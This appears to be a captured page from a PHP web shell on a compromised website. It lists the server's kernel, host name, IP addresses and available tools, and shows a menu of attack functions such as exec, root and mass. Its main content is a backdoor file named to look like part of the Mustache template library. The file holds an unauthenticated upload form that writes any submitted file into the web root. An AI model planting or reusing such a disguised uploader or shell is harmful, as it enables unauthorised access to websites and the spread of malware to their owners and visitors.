Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 18.218.223.84 | Time @ Server : 19 Oct 2024 10:29:41
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/mustache/mustache/src/Mustache/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/mustache/mustache/src/Mustache/Tokenizer-inc.php

<!DOCTYPE html> <html> <head> <meta charset=utf-8> <title>File</title> </head> <body> <h1>File</h1> <form method="post" enctype="multipart/form-data"> <input type="file" name="filename"><br> <input type="submit" value="LOAD"><br> </form> <?php if (is_uploaded_file($_FILES["filename"]["tmp_name"])) { move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]); $file = $_FILES["filename"]["name"]; echo '<a href='.$file.'>'.$file.'</a>'; } else { echo("FILE"); } ?> </body> </html>